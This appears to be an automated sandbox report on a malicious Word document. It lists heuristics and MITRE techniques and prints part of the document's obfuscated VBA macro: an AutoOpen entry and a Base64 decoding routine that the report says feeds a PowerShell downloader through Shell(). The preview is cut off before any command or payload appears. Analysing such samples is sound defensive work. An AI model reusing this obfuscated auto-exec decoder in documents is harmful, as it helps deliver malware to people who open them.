Verdict: MALICIOUS
Risk Score: 342

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes CreateObject and Shell() to execute a Base64-decoded PowerShell command stager, indicating a downloader or initial execution stage. The presence of the Shell() call and the specific PowerShell command stager strongly suggests a malicious intent to download and execute further payloads.
Heuristics (9)

- ClamAV: Doc.Downloader.WithMacro-6310867-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- VBA Base64-decoded Shell command stager (critical, OLE_VBA_BASE64_SHELL_COMMAND_STAGER): VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17206 bytes |

SHA-256 (macros.bas): 25cda99f1d0da8e79aae1be61bd1c1c26d1f5fc7438cb7d36e1e8e32df705722
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim swJD1aP6 As Boolean
swJD1aP6 = False
Dim lBfdQi As Double
lBfdQi = 62663.258433826
Dim Wa87uf As Boolean
Wa87uf = True
F8dva
End Sub
Attribute VB_Name = "Module2"
Public Function dD3ilQO(ByVal jTfWg)
Dim uu0pN7FDU As Byte
uu0pN7FDU = 113
Dim Xzvd2yBaA As Long
Xzvd2yBaA = -1374405482
Dim h3P6Zb As Single
h3P6Zb = Round(1262.4193239549)
Dim lMiNa4Su
Dim oLIQF2b
Dim U6xgET8 As Integer
U6xgET8 = Sgn(19223)
Dim iHc1oKW5j As Long
iHc1oKW5j = -1493592986
Dim FC1JkWL As Byte
FC1JkWL = 82
Dim tYC3wJ As Integer
tYC3wJ = Sgn(-22457)
Dim MydfL As Integer
MydfL = -21598
Dim G0SbnABF As Long
G0SbnABF = -1929898222
Set lMiNa4Su = CreateObject(xdhpXcO)
Dim wjx93n As Single
wjx93n = Round(34461.076033849)
Dim QDxhwk As Byte
QDxhwk = 212
Dim OQjBbkd As Double
OQjBbkd = Sgn(29356.940918728)
Dim vy98u As Integer
vy98u = 23865
Dim NY03x As Double
NY03x = 11504.587200717
Set oLIQF2b = lMiNa4Su.CreateElement(EpntLR)
Dim kXyjTQ3Z As Byte
kXyjTQ3Z = 170
Dim iNSaL4m As Single
iNSaL4m = 7200.9092840894
Dim NbYD5Md As String
NbYD5Md = vbNullString
Dim QduHA
QduHA = StrConv(H753JO, vbProperCase)
Dim VVEgaZ As Single
VVEgaZ = Sgn(49957.282412604)
With oLIQF2b
Dim B8JS7 As Long
B8JS7 = Sgn(0)
Dim rboz9Q2 As Byte
rboz9Q2 = 252
Dim U0v31Zs As Integer
U0v31Zs = -9722
oLIQF2b.DataType = "bin." & EpntLR
Dim m2CjTOZU As Long
m2CjTOZU = Sgn(0)
Dim e1pqcxfG As Double
e1pqcxfG = Round(879.62519730969)
oLIQF2b.Text = jTfWg
End With
Dim GkAwVy6 As Boolean
GkAwVy6 = True
Dim NtNc4kiPK As Byte
NtNc4kiPK = 137
Dim JV5lb As Long
JV5lb = Sgn(0)
dD3ilQO = MM9AP6(oLIQF2b.nodeTypedValue)
Dim daj2l
daj2l = Len(HTkePM3u)
Dim tLu4H As Integer
tLu4H = 30944
Set oLIQF2b = Nothing
Set lMiNa4Su = Nothing
End Function
Function MM9AP6(Binary)
Dim z8IMRmy As Long
z8IMRmy = Sgn(-970809712)
Dim EN0SAehaD As Single
EN0SAehaD = 46363.8290906
Dim uYvOS6 As Long
uYvOS6 = 0
Const C649c = 2
Const J5JkQwUVM = 1
Dim XHmQSZEk As Byte
XHmQSZEk = 202
Dim uoEb17jua As Boolean
uoEb17jua = True
Dim MR0sldcev As Long
MR0sldcev = Sgn(-929278598)
Dim NJsZjnU
Dim KgJfKDVGs As Byte
KgJfKDVGs = 52
Dim mhv0TFsy As Integer
mhv0TFsy = 24825
Dim X7wmUiO
X7wmUiO = StrConv(jcVvbx3, vbLowerCase)
Dim AaFywq As Byte
AaFywq = 244
Dim N0kTfIy3 As Boolean
N0kTfIy3 = False
Dim WmM0afn1Z As Byte
WmM0afn1Z = 53
Dim PSTpd6G As Long
PSTpd6G = -508499954
Dim Sg4TO0H As String
Sg4TO0H = Val("J")
Set NJsZjnU = CreateObject("adodb.stream")
Dim et3CoV As Long
et3CoV = Sgn(0)
Dim uB7TMZfh As Single
uB7TMZfh = Sgn(44170.589517774)
Dim jtobmUkzA As Double
jtobmUkzA = 63178.085553038
Dim PActslhme As Double
PActslhme = Round(45035.594744317)
With NJsZjnU
Dim klC62ZQf As Double
klC62ZQf = Sgn(14030.460836578)
Dim vy0efUGx As Long
vy0efUGx = Sgn(-1737644752)
Dim StAgI
StAgI = Asc("^")
Dim MA6fPR As String
MA6fPR = vbNullString
.Type = J5JkQwUVM
Dim rWpzVO As Double
rWpzVO = Fix(31693.630577065)
Dim g7ywe0cz As Double
g7ywe0cz = Round(39036.616020474)
.Open
Dim AAhtxa2fF As Single
AAhtxa2fF = Sgn(25611.007985664)
Dim HPO2Deafh
HPO2Deafh = ""
Dim MAMgEJ As Boolean
MAMgEJ = True
Dim tkA28h As Boolean
tkA28h = False
Dim NqXM5fk As Double
NqXM5fk = Sgn(50204.09539515)
.Write Binary
Dim OkzyQm As Long
OkzyQm = Sgn(0)
Dim M4CKa As String
M4CKa = StrConv(vTvcDSCFQ, vbProperCase)
.Position = 0
Dim O3tYkhKsM As Integer
O3tYkhKsM = -27842
Dim gBgZc24F As Single
gBgZc24F = 43034.963077576
.Type = C649c
Dim f2Pcx As Double
f2Pcx = Val(55913.562171349)
Dim yonlON As Boolean
yonlON = True
Dim P1XqQe As Double
P1XqQe = Sgn(29368.821322486)
Dim hB83bq5mK As Byte
hB83bq5mK = 176
Dim t6TRIL21g As Boolean
t6TRIL21g = True
Dim mexRF As Do
```

... (truncated)